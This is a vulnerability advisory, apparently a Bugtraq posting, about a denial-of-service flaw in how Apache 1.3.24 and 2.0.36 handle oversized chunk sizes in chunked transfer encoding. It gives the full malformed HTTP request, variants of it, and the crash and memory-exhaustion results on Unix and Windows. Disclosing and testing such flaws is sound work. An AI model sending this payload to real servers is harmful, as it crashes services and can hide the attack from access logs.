Apache on Windows, Linux, *BSD, Unix
Signed interpretation of unsigned value
Denial of Service
Bugtraq
From the Bugtraq posting.
Greetings sweaty Apache admins,
Now that the Apache group has released official fixes, here is a
test string that can be used to check if your server is vulnerable:
POST /x.html HTTP/1.1
Host: 192.168.x.x
Transfer-Encoding: chunked
80000000
Rapid 7
0
Here is the behavior that the above string will produce:
UNIX:
Apache 1.3.24:
Connection is instantly dropped.
The connection is not logged in the access_log, but the following
will appear in the error_log:
[Mon Jun 17 16:12:25 2002] [notice] child pid 21452 exit signal
Segmentation fault (11)
Apache 2.0.36:
No effect! Hmmm...
Win32:
Apache 1.3.24:
Connection is instantly dropped.
The connection is *not* logged in access_log nor error_log!
Apache 2.0.36:
Connection appears to hang while child thread consumes all
available memory. After a minute or two, the OS reports that
virtual memory is exhausted via a server-side dialog box.
A remote client cannot determine the result of this test
because the connection remains open until the dialog box is
dismissed. A non-vulnerable server will not drop the
connection because it is waiting to receive 2 gigabytes of
legitimately chunked data.
The connection is not logged in access_log, but the following will
appear in the error_log:
[Tue Jun 18 09:16:34 2002] [notice] Parent: child process exited
with status 3221225477 -- Restarting.
- ---
Note that in the test string above, you can interchange the "POST"
with "GET", and you can use any hex value between 80000000 and
FFFFFFFF for the chunk size.
Comments are much appreciated.
- Joe Testa
GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4
POST /x.html HTTP/1.1 Host: 192.168.x.x Transfer-Encoding: chunked 80000000 Rapid 7 0